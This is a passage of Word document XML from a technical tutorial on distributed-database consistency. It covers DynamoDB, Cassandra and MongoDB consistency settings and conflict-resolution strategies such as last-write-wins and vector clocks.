    <w:p w14:paraId="52B0CA70" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- 2. Primary: writes locally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63531323" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- 3. Primary: sends WAL to replica1 and replica2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05120780" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- 4. Primary: WAITS for at least 1 replica to flush WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB66E8D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- 5. Primary: ACKs to client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BBE1C7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- Guarantee: After ACK, reading from the sync replica returns new balance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D15EDE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.2 DynamoDB — Tunable Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493140BE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018D878D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>import boto3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D95ED7D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>dynamodb = boto3.resource('dynamodb')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC48FE7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>table = dynamodb.Table('Orders')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED17ECC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="75FA53AA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t># Eventually consistent read (default — cheaper, faster)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F688ED4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>response = table.get_item(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C2E6A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Key={'order_id': '12345'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64CD525A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    ConsistentRead=False  # May return stale data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DD293A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46836A71" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="3A9738C2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t># Strongly consistent read (costs 2x, higher latency)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56693DCC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>response = table.get_item(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E74945A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Key={'order_id': '12345'},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="796C00FB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    ConsistentRead=True   # Always returns the latest write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6E978B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B87ACD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DynamoDB's model:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104BD302" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1585"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Writes are always to a leader (strongly consistent write).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47EAA09C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1585"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Reads default to eventually consistent (may hit a non-leader replica).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2052F2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1585"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>ConsistentRead=True forces read from the leader node (strong consistency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661AD252" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1585"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Cost: strongly consistent reads cost 2x the RCU of eventually consistent reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E038DC6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.3 Cassandra — Tunable Consistency Per-Query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5962B3AE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>cql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A93F061" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- Write with quorum (strong when paired with quorum read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58798EBB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>INSERT INTO users (id, name) VALUES (uuid(), 'Alice')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A657F70" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>USING CONSISTENCY QUORUM;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D6CDEB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="75A68F3A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- Read with quorum (strong: W + R &gt; N → 2 + 2 &gt; 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D1A2A1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>SELECT * FROM users WHERE id = ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3258A606" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>CONSISTENCY QUORUM;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE5FC1D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="4B05A666" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>-- Fast but eventually consistent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CD63EF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>SELECT * FROM users WHERE id = ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7F893D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>CONSISTENCY ONE;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C0B298" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Per-query tuning allows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629024FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1586"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Critical operations (payment): QUORUM write + QUORUM read (strong)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE811D1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1586"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Non-critical reads (feed): ONE read (fast, eventually consistent)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38006E32" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1586"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Same database, different consistency per access pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039043E4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.4 MongoDB — Configurable per Operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50893F7E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C55B16C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>// Write concern: how many replicas must acknowledge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E843E3F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>db.orders.insertOne(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7254D1B2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  { item: "widget", qty: 5 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFD9F90" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  { writeConcern: { w: "majority", j: true } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDF2191" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  // Majority of replica set must acknowledge + journal to disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411791BD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403EE63D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="48137F30" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>// Read concern: what level of consistency for reads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0323CA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>db.orders.find({ status: "pending" }).readConcern("majority")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2680BD93" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>// Returns only data acknowledged by majority (durable, won't be rolled back)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F564EE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="682DBE99" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>// Causal consistency with sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF5E001" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>const session = db.getMongo().startSession({ causalConsistency: true })</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9F59D6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>const coll = session.getDatabase("test").orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2846278F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>coll.insertOne({ x: 1 })  // Write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266850FF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>coll.find({})              // Guaranteed to see the insert above (causal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF81B62" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>session.endSession()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3F42C9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:pict w14:anchorId="66758DC8">
          <v:rect id="_x0000_i6041" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F1FE18" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Conflict Resolution in Eventually Consistent Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ADE046" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Why Conflicts Occur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63819327" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF72212" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Two clients write to the same key simultaneously on different replicas:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE31AC1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="36862EA9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Time →  ───────────────────────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8ED59" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Node A: write(X=5) from Client 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55765502" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Node B: write(X=7) from Client 2   (simultaneous, no coordination)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A81A39" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="4702D725" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>When nodes sync: X=5 or X=7? CONFLICT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5304897F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>6.2 Resolution Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701BABEB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Last-Write-Wins (LWW):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709F4DF4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E85F3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Attach timestamps to all writes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E57BF1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node A: X=5, timestamp=1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D09D06" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node B: X=7, timestamp=1002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0624CC2B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="4CB9510E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Resolution: higher timestamp wins → X=7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C677234" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>All nodes converge to X=7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27953937" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
    <w:p w14:paraId="22C0C46E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Problem: Clock skew can cause "earlier" logical writes to win.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583C7472" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Node A's clock is 5ms ahead → its writes always win regardless of true ordering.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224C1401" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Problem: Data loss — the write X=5 is silently discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA834FE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used by:</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t> Cassandra (default), DynamoDB (implicit), many eventually consistent systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F05CAD0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Vector Clocks (detect conflicts, defer resolution):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4285E5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F179775" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Vector clock: per-node logical counter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A2151" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F"/>
